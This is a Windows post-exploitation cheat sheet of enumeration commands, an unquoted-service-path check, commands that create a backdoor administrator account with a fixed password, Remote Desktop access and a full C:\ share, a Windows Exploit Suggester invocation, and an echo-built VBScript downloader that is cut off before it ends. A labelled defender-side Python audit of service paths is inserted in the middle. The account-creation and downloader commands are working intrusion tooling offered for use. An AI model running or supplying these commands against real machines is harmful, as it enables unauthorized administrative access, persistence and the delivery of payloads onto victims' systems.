Enumeration

  • General information:
net config Workstation & hostname & net users & set
  • System information:
systeminfo
  • Precise version:
type C:\Windows\System32\eula.txt
  • Network information:
netstat -ano | findstr "LISTEN" & ipconfig /all & arp -a & route print
  • Firewall information:
netsh firewall show state & netsh firewall show config
  • Scheduled tasks:
schtasks /query /fo LIST /v | findstr /B /C:"HostName" /C:"TaskName" /C:"Next Run Time" /C:"Run As User" /C:"Comment" /C:"Author"
  • Services:
wmic service list brief
tasklist /svc
net start
  • Unquoted service binary paths (missing quotes around a path containing spaces) (use this if already Administrator):
wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """
  • Otherwise, list the services and inspect each binary path for missing quotes manually:
sc query
sc qc <ServiceName>
  • Missing autorun files (using Windows Sysinternals Autoruns):
autorunsc.exe -a | findstr /n /R "File\ not\ found"
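A defender-side audit for the unquoted-path check above, written as an added Python example that is not part of this cheat sheet: it parses a constructed sample of the fixed-width table printed by wmic service get name,pathname,startmode and flags only services whose unquoted path actually contains a space before the executable, a distinction the findstr chain does not make (it also reports unquoted paths without spaces, which are not ambiguous).

```python
# Added defender-side audit (not part of the original cheat sheet): parse the
# fixed-width table from `wmic service get name,pathname,startmode` and flag
# services whose image path is unquoted AND has a space before the .exe, the
# only case the service control manager resolves ambiguously. If wmic output
# was redirected to a file, it is UTF-16LE: open it with encoding="utf-16".
import re

# Constructed sample, padded to column width the way wmic prints it.
_ROWS = [
    ("Name", "PathName", "StartMode"),
    ("Spooler", r"C:\Windows\System32\spoolsv.exe", "Auto"),
    ("BackupSvc", r"C:\Program Files\Acme Backup\agent.exe -service", "Auto"),
    ("GoodSvc", r'"C:\Program Files\Good Vendor\good.exe" /run', "Auto"),
    ("NoSpaceSvc", r"C:\Tools\nospace.exe", "Auto"),
    ("ManualSvc", r"C:\Program Files\Acme Backup\helper.exe", "Manual"),
]
SAMPLE = "\n".join(f"{n:<12}{p:<49}{s}" for n, p, s in _ROWS) + "\n"

def parse_wmic_table(text):
    """Split wmic's fixed-width table using the header's column offsets."""
    lines = [ln.rstrip() for ln in text.splitlines() if ln.strip()]
    starts = [m.start() for m in re.finditer(r"\S+", lines[0])]
    spans = list(zip(starts, starts[1:] + [None]))
    cols = [lines[0][s:e].strip() for s, e in spans]
    return [dict(zip(cols, [ln[s:e].strip() for s, e in spans]))
            for ln in lines[1:]]

def is_unquoted_with_space(pathname):
    """True if the image path is unquoted and has a space before the .exe."""
    p = pathname.strip()
    if p.startswith('"'):
        return False               # quoted paths are resolved unambiguously
    m = re.match(r"(.*?\.exe)\b", p, re.IGNORECASE)
    exe = m.group(1) if m else p   # no .exe found: test the whole string
    return " " in exe

def find_vulnerable_services(text, only_auto=True, skip_windows_dir=True):
    """Names of services whose image path needs quoting (or directory ACL review)."""
    flagged = []
    for row in parse_wmic_table(text):
        path = row["PathName"]
        if only_auto and row["StartMode"].lower() != "auto":
            continue                # same filters as the findstr chain above
        if skip_windows_dir and path.lower().startswith("c:\\windows\\"):
            continue
        if is_unquoted_with_space(path):
            flagged.append(row["Name"])
    return flagged
```

find_vulnerable_services(SAMPLE) returns ['BackupSvc']; each flagged service should have its image path quoted (sc config <Name> binPath= "\"<full path>\" <args>") or the write ACLs on the directories along that path reviewed.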

User Creation

  • Add a new user, add them to the Administrators and Remote Desktop Users local groups, and share C:\ to them:
net user /add snz Password123
net localgroup administrators snz /add
net localgroup "Remote Desktop Users" snz /add
net share SNZ=c:\ /grant:snz,full
  • Same as above, but one line:
net user /add snz Password123 & net localgroup administrators snz /add & net localgroup "Remote Desktop Users" snz /add & net share SNZ=c:\ /grant:snz,full

Tools / Exploits

  • Windows Exploit Suggester (compare systeminfo output against the Microsoft bulletin database):
python windows-exploit-suggester.py -d 2020-12-12-mssb.xls -i systeminfo.txt
  • Wget script for Windows:
echo strUrl = WScript.Arguments.Item(0) > wget.vbs
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
echo Dim http,varByteArray,strData,strBuffer,lngCounter,fs,ts >> wget.vbs
echo Err.Clear >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs
echo http.Open "GET",strURL,False >> wget.vbs
echo http.Send >> wget.vbs
echo varByteArray = http.ResponseBody >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs
echo Set ts = fs.CreateTextFile(StrFile,True) >> wget.vbs
echo strData = "" >> wget.vbs
echo strBuffer = "" >> wget.vbs
echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs
echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1,1))) >> wget.vbs
echo Next >> wget.vbs
echo ts.Close >> wget.vbs